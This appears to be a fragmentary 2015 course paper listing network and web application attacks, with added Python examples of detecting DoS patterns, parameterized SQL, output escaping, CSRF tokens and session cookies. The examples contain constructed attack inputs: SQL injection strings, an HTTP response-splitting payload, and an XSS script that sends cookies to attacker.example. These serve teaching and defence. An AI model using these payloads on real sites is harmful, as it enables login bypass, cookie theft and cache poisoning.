Security and Protection of Web Applications

Published on 26-Jul-2015


Course paper, WEB, 2014 (Microsoft); no. 400295.

Only the headings and scattered details of the transcript survived extraction. Where a section's text is lost, only its heading is kept; the body below records what can still be read.

Contents

Introduction
Phishing
DoS (Denial of Service attacks)
  Flood (Flood Feed)
Sniffing
IP Hijack
IP Spoofing
Brute Force
Back Orifice (NetBus, Masters of Paradise, etc.)
Dummy DNS Server
Dummy ARP Server
Fuzzy
Hack
Host Spoofing
Puke
Port Scan
Syslog Spoofing
Spam
Traffic Analysis (Sniffing)
Trojan Horse
Worms
File Worms
Botnet
Unreachable (dest_unreach, ICMP type 3)
UDP Storm
HRS (HTTP Response Splitting)
Web Cache Poisoning
Browser Cache Poisoning
Malware
Keyloggers and Screenloggers
Pharming
Man-in-the-Middle
Man-in-the-Browser
Spyware
Buffer Overflow
Heap Overflow
Stack Overflow
Integer Overflow
Cross Site Scripting (XSS)
Malicious file execution
Session Hijacking
SQL Injection
Cross-site request forgery (CSRF)
Hidden Fields Manipulation
Protection measures

Attacks

DoS (Denial of Service attacks)

The paper groups denial-of-service attacks into floods, ICMP flooding and identification flooding, and describes these variants:

- SYN Flood: the attacker sends TCP SYN segments, usually from forged addresses; the target answers each with SYN/ACK and keeps the half-open connection until it times out, so its connection table fills up.
- ICMP Flood (Ping Flood): a stream of ICMP echo requests.
- Identification Flood (Ident Flood): the same idea aimed at the identd service on TCP port 113.
- DNS Flood: a stream of queries against DNS servers.
- DDoS: any of the above launched from many hosts at once.
- Boink (Bonk, Teardrop): malformed, overlapping IP fragments that crash the reassembly code.
- Pong.
- Smurf: ICMP echo requests sent to a network's broadcast address with the victim's address forged as the source, so every host on that network replies to the victim; the replies can saturate the victim's WAN link to its ISP.
- Ping of Death: a fragmented ICMP echo request that reassembles to more than the 65535-byte IP maximum; each fragment fits the MTU and so passes, and older stacks crashed on reassembly.
- UDP Flood: UDP datagrams with forged source IPs, often aimed at DNS servers.
- HTTP Flood: a large volume of HTTP requests, typically from a botnet (DDoS); the paper mentions the w3cache proxy in this context.
- Land: a packet whose source and destination address and port are identical (the paper's example: 192.168.0.101:9006 to 192.168.0.101:9006); vulnerable stacks went to 100% CPU.
- Mail Bombing: flooding a mailbox or mail server with messages.

Sniffing. IP Hijack. IP Spoofing. Brute Force.

Back Orifice (NetBus, Masters of Paradise, etc.): remote-control trojans; Back Orifice listens by default on port 31337.

Dummy DNS Server: a rogue DNS server that answers with false records.

Dummy ARP Server: a rogue responder for ARP (Address Resolution Protocol, which maps IP addresses to hardware addresses).

Fuzzy: malformed packets in the IP protocols (TCP, UDP, ICMP).

Hack: a general break-in attempt, typically preceded by a port scan or combined with DoS.

Host Spoofing: forged ICMP redirect messages that reroute the victim's traffic.

Puke: forged ICMP unreachable errors that break a victim's connection (e.g. to an IRC server).

Port Scan.

Syslog Spoofing: forged syslog messages.

Spam. Traffic Analysis (Sniffing).

Trojan Horse: five types are listed; the readable ones are trojans that open an FTP server on the victim (2), key loggers that record keystrokes (4) and agents for DDoS (Distributed Denial of Service) (5).

Worms. File Worms. Botnet.

Unreachable (dest_unreach, ICMP type 3): forged ICMP type 3 messages that make the victim drop connections.

UDP Storm: a forged UDP datagram from the echo port (7) of one host to the chargen port (19) of another (or of the same host, e.g. 127.0.0.1) makes the two services answer each other endlessly: chargen replies to every datagram and echo returns each reply.

HRS (HTTP Response Splitting): CR/LF characters injected into an HTTP header value make the web server emit what the client or a proxy parses as two HTTP responses, the second one controlled by the attacker.

Web Cache Poisoning: the attacker's second response is stored by a caching proxy and served to other users.

Browser Cache Poisoning: the same technique against the browser's own cache.

Malware. Keyloggers and Screenloggers.

Pharming: the hosts file or DNS is modified so that a correct URL resolves to the attacker's server.

Man-in-the-Middle. Man-in-the-Browser. Spyware.

Buffer Overflow; Heap Overflow (a buffer overflow in heap memory); Stack Overflow (a buffer overflow in stack memory).

Integer Overflow: an arithmetic result that does not fit its type wraps around (a signed 16-bit integer holds -32768 to 32767); used, for example, to pass a size check with a value that is later used for allocation.

Cross Site Scripting (XSS): injection of client-side code (HTML, XHTML, JavaScript, ActiveX, VBScript, Flash, etc.) into pages shown to other users; used for session hijacking, phishing and distributing malware (viruses, worms, trojans). The paper cites Symantec figures of 80% (share of XSS) and 70%. Three types:
1. Reflected (non-persistent): the payload is carried in the request and echoed back by the server.
2. Stored (persistent): the payload is saved on the server and served to every visitor.
3. DOM-based: the page's own client-side script inserts the payload into the DOM.

Malicious file execution: a URL or parameter that names a file lets the attacker include or run a file of his choosing.

Session Hijacking: taking over a user's authenticated session by stealing its identifier.

SQL Injection: user input concatenated into SQL statements against databases such as MySQL or MSSQL, so the attacker changes the query.

Cross-site request forgery (CSRF): the browser of a logged-in user is made to send a request the user did not intend.

Hidden Fields Manipulation: hidden form fields are edited by the client before submission.

Protection measures

1. (text lost)
2. A gateway in front of the application, e.g. Microsoft Forefront Threat Management Gateway.
3. (text lost)
4. (text lost)
5. Transport protection with SSL.
6. SSL; the paper notes the case of SSL with ActiveSync.
7. (text lost)
8. (text lost) ...
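The Land, UDP Storm and SYN Flood patterns from the DoS section can be recognised in a packet trace. The following is an added example, not code from the paper: it works on packet records constructed by hand (a real tool would decode them from a pcap), and the Packet fields, the one-second window and the threshold of 50 half-open SYNs are assumptions of this example.

```python
"""Detect three DoS patterns (Land, UDP storm, SYN flood) in a packet trace.

Added example, not code from the paper. Packet records are constructed by
hand below; the Packet fields and the thresholds are assumptions.
"""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float          # arrival time in seconds
    proto: str         # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    flags: str = ""    # TCP flags as letters: "S" = SYN, "SA" = SYN/ACK, "A" = ACK


def is_land(p: Packet) -> bool:
    """Land: source and destination address and port are identical."""
    return p.src == p.dst and p.sport == p.dport


UDP_STORM_PORTS = {7, 19}  # echo and chargen


def is_udp_storm(p: Packet) -> bool:
    """A datagram between the echo and chargen ports starts an endless
    exchange; a loopback or otherwise forged source makes it a sure sign."""
    return p.proto == "udp" and p.sport in UDP_STORM_PORTS and p.dport in UDP_STORM_PORTS


def half_open_counts(packets, window=1.0):
    """Per (dst, dport, time bucket): SYNs never completed by the client's
    final ACK. Forged flood sources leave every SYN open; real clients finish
    the handshake, so their SYNs are subtracted again."""
    pending = {}           # flow 4-tuple -> bucket of its SYN
    half_open = Counter()
    for p in sorted(packets, key=lambda q: q.ts):
        if p.proto != "tcp":
            continue
        flow = (p.src, p.sport, p.dst, p.dport)
        if p.flags == "S":
            bucket = int(p.ts // window)
            pending[flow] = bucket
            half_open[(p.dst, p.dport, bucket)] += 1
        elif "A" in p.flags and flow in pending:
            bucket = pending.pop(flow)
            half_open[(p.dst, p.dport, bucket)] -= 1
    return half_open


def analyze(packets, window=1.0, syn_threshold=50):
    """Findings for a trace: Land packets, UDP-storm triggers and the
    (dst, dport) pairs with at least syn_threshold half-open SYNs in a window."""
    flood = {(dst, dport)
             for (dst, dport, _), n in half_open_counts(packets, window).items()
             if n >= syn_threshold}
    return {
        "land": [p for p in packets if is_land(p)],
        "udp_storm": [p for p in packets if is_udp_storm(p)],
        "syn_flood": sorted(flood),
    }


def sample_trace():
    """Constructed trace: three normal handshakes, a 120-packet SYN flood from
    forged sources, one Land packet and one echo->chargen datagram."""
    pkts = []
    for i in range(3):
        src, sport, t = f"192.168.1.{10 + i}", 40000 + i, 0.1 * i
        pkts.append(Packet(t, "tcp", src, sport, "10.0.0.5", 80, "S"))
        pkts.append(Packet(t + 0.01, "tcp", "10.0.0.5", 80, src, sport, "SA"))
        pkts.append(Packet(t + 0.02, "tcp", src, sport, "10.0.0.5", 80, "A"))
    for i in range(120):
        pkts.append(Packet(1.0 + i / 200, "tcp", f"203.0.113.{i % 250 + 1}",
                           1024 + i, "10.0.0.5", 80, "S"))
    pkts.append(Packet(2.0, "tcp", "192.168.0.101", 9006, "192.168.0.101", 9006, "S"))
    pkts.append(Packet(2.1, "udp", "127.0.0.1", 7, "10.0.0.5", 19))
    return pkts


if __name__ == "__main__":
    for kind, hits in analyze(sample_trace()).items():
        print(kind, hits if kind == "syn_flood" else len(hits))
```

The SYN counter subtracts completed handshakes per flow rather than simply counting SYNs, so a busy but healthy server scores near zero while a flood from forged sources scores the full count.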
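For the SQL Injection section, the same login query built two ways shows why concatenation is the problem and placeholders the fix. This is an added example, not code from the paper; it uses an in-memory SQLite database with constructed rows (the effect is the same on MySQL or MSSQL), and the table layout and plaintext passwords exist only for brevity.

```python
"""SQL injection: the same login query built by concatenation and with
placeholders.

Added example, not code from the paper. In-memory SQLite with constructed
rows; the table layout and plaintext passwords are for demonstration only.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """The user's text becomes part of the SQL statement itself."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Placeholders: the driver passes the values separately from the SQL
    text, so a quote or comment marker in the input stays plain data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Closes the quoted string, adds an always-true condition and comments out
# the password check; the vulnerable statement becomes
#   ... WHERE username = '' OR 1=1 --' AND password = 'x'
PAYLOAD_ALL_ROWS = "' OR 1=1 --"

# Logs in as a chosen user without the password:
#   ... WHERE username = 'alice' --' AND password = 'x'
PAYLOAD_AS_ALICE = "alice' --"


if __name__ == "__main__":
    db = make_db()
    print("normal login:       ", login_parameterized(db, "bob", "hunter2"))
    print("vulnerable, payload:", login_vulnerable(db, PAYLOAD_ALL_ROWS, "x"))
    print("vulnerable, as user:", login_vulnerable(db, PAYLOAD_AS_ALICE, "x"))
    print("parameterized:      ", login_parameterized(db, PAYLOAD_ALL_ROWS, "x"))
```

Escaping quotes by hand is not a substitute for placeholders: the driver knows the target database's quoting rules and character set, and the parameterized form also keeps the query plan stable.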
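Reflected XSS and HTTP Response Splitting are the same mistake in two output contexts: untrusted input copied into an HTML body, and into an HTTP header. The added example below (not code from the paper) shows both the vulnerable and the corrected form for each; the tiny response builders stand in for a web framework and the request values, including the attacker hostname in the script payload, are constructed.

```python
"""Untrusted input in two output contexts: HTML body (reflected XSS) and
HTTP header (HTTP Response Splitting), vulnerable and corrected.

Added example, not code from the paper. The response builders are stand-ins
for a framework; payload strings and hostnames are constructed.
"""
import html


# --- Reflected XSS: a search term echoed into the page ---------------------

def render_results_vulnerable(query: str) -> str:
    """The raw parameter is pasted into the markup."""
    return f"<h1>Results for: {query}</h1>"


def render_results_safe(query: str) -> str:
    """Escape for the HTML text context; quote=True also covers attributes."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


# --- HTTP Response Splitting: a parameter copied into a header -------------

def redirect_vulnerable(target: str) -> bytes:
    """A CR/LF pair inside `target` ends the header block early; everything
    after it is parsed by the client or a proxy as a second response."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode()


def redirect_safe(target: str) -> bytes:
    """Header values may never contain CR or LF: reject rather than strip,
    so a sanitiser bypass cannot quietly reopen the hole."""
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF in header value")
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode()


def count_responses(raw: bytes) -> int:
    """How many HTTP status lines a parser would see in the byte stream."""
    return sum(1 for line in raw.split(b"\r\n") if line.startswith(b"HTTP/1.1 "))


# Constructed payloads.
XSS_PAYLOAD = ('<script>document.location="http://attacker.example/?c="'
               '+document.cookie</script>')
SPLIT_PAYLOAD = ("/home\r\nContent-Length: 0\r\n\r\n"
                 "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 "Content-Length: 17\r\n\r\n<h1>poisoned</h1>")


if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PAYLOAD))
    print(render_results_safe(XSS_PAYLOAD))
    print("responses in vulnerable redirect:",
          count_responses(redirect_vulnerable(SPLIT_PAYLOAD)))
    try:
        redirect_safe(SPLIT_PAYLOAD)
    except ValueError as e:
        print("safe redirect refused:", e)
```

The second response in the split output is what a caching proxy stores under the requested URL, which is the mechanism behind the Web Cache Poisoning section above.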
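Hidden Fields Manipulation and CSRF both come down to the server trusting form values it cannot verify. One block serves both sections: an HMAC over the field value, bound to the session, makes an edited hidden field detectable, and the same primitive yields a CSRF token that a cross-site form cannot forge. This is an added example, not code from the paper; SERVER_KEY, the "value|mac" field layout, the session identifiers and the checkout handler are assumptions of this example.

```python
"""HMAC-signed hidden fields and a session-bound CSRF token.

Added example, not code from the paper. SERVER_KEY, the "value|mac" layout,
the session ids and the checkout handler are assumptions of this example.
"""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # stays on the server, never sent out


def _mac(*parts: str, key: bytes = SERVER_KEY) -> str:
    """HMAC-SHA256 over the labelled parts; the label keeps field tags and
    CSRF tags from being swapped for one another."""
    return hmac.new(key, "|".join(parts).encode(), hashlib.sha256).hexdigest()


# --- Hidden fields: the value is signed together with its session ----------

def sign_hidden_field(name: str, value: str, session_id: str) -> str:
    """What the server renders into <input type="hidden" name=... value=...>."""
    return f"{value}|{_mac('field', session_id, name, value)}"


def field_is_valid(name: str, submitted: str, session_id: str) -> bool:
    value, _, tag = submitted.rpartition("|")
    return hmac.compare_digest(tag, _mac("field", session_id, name, value))


def read_hidden_field(name: str, submitted: str, session_id: str) -> str:
    """Return the value only if its tag matches; an edited price fails."""
    if not field_is_valid(name, submitted, session_id):
        raise ValueError(f"hidden field {name!r} was tampered with")
    return submitted.rpartition("|")[0]


# --- CSRF token: random nonce bound to the session -------------------------

def issue_csrf_token(session_id: str) -> str:
    nonce = secrets.token_hex(16)
    return f"{nonce}|{_mac('csrf', session_id, nonce)}"


def verify_csrf_token(token: str, session_id: str) -> bool:
    """A token minted for another session (or invented) does not verify."""
    nonce, _, tag = token.partition("|")
    return hmac.compare_digest(tag, _mac("csrf", session_id, nonce))


def handle_checkout(form: dict, session_id: str) -> dict:
    """Server-side handler: refuses forged requests and edited prices."""
    if not verify_csrf_token(form.get("csrf", ""), session_id):
        raise PermissionError("missing or foreign CSRF token")
    price = read_hidden_field("price", form["price"], session_id)
    return {"item": form["item"], "price": price}


if __name__ == "__main__":
    sid = "session-of-alice"          # constructed session id
    form = {"item": "laptop", "csrf": issue_csrf_token(sid),
            "price": sign_hidden_field("price", "999.00", sid)}
    print(handle_checkout(form, sid))
    form["price"] = "0.01|" + form["price"].split("|")[1]
    print("edited price accepted:", field_is_valid("price", form["price"], sid))
```

Binding both tags to the session id is what matters: a token or signed field captured from the attacker's own session is useless against the victim's.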
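The Session Hijacking section and the SSL items among the protection measures meet in how the session identifier is issued and carried. The added example below (not code from the paper) generates identifiers from the OS random source, rotates them at login, and emits the cookie with the Secure, HttpOnly and SameSite attributes using the standard library's http.cookies (SameSite needs Python 3.8 or later). The in-memory SessionStore and the cookie name are assumptions of this example.

```python
"""Session identifiers that resist hijacking: random, rotated at login and
sent only as a Secure, HttpOnly, SameSite cookie.

Added example, not code from the paper. SessionStore is an in-memory stand-in
for a real session backend; the cookie name is an assumption.
"""
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "SESSIONID"


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def create(self, data=None) -> str:
        """256 random bits from the OS CSPRNG: not guessable, unlike
        counters or time-derived identifiers."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = dict(data or {})
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def regenerate(self, old_sid: str) -> str:
        """Issue a fresh identifier and retire the old one. Done at every
        privilege change so an identifier the attacker planted or observed
        before authentication (session fixation) is worthless afterwards."""
        data = self._sessions.pop(old_sid)
        return self.create(data)

    def login(self, sid: str, username: str) -> str:
        new_sid = self.regenerate(sid)
        self._sessions[new_sid]["user"] = username
        return new_sid


def session_cookie_header(sid: str, secure: bool = True) -> str:
    """Set-Cookie line for the session id.
    Secure: never sent over plain HTTP, so a sniffer on the path cannot read it.
    HttpOnly: not readable from script, so XSS cannot steal it.
    SameSite=Lax: not attached to cross-site POSTs, which blunts CSRF."""
    cookie = SimpleCookie()
    cookie[COOKIE_NAME] = sid
    morsel = cookie[COOKIE_NAME]
    morsel["path"] = "/"
    morsel["httponly"] = True
    morsel["secure"] = secure
    morsel["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create({"cart": ["book"]})
    authed = store.login(anon, "alice")
    print(session_cookie_header(authed))
    print("old id still valid:", store.get(anon) is not None)
```

Without the Secure flag the identifier travels in clear on the first plain-HTTP request, which is exactly the sniffing and IP-hijack exposure listed earlier; SSL on the login page alone does not close it.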
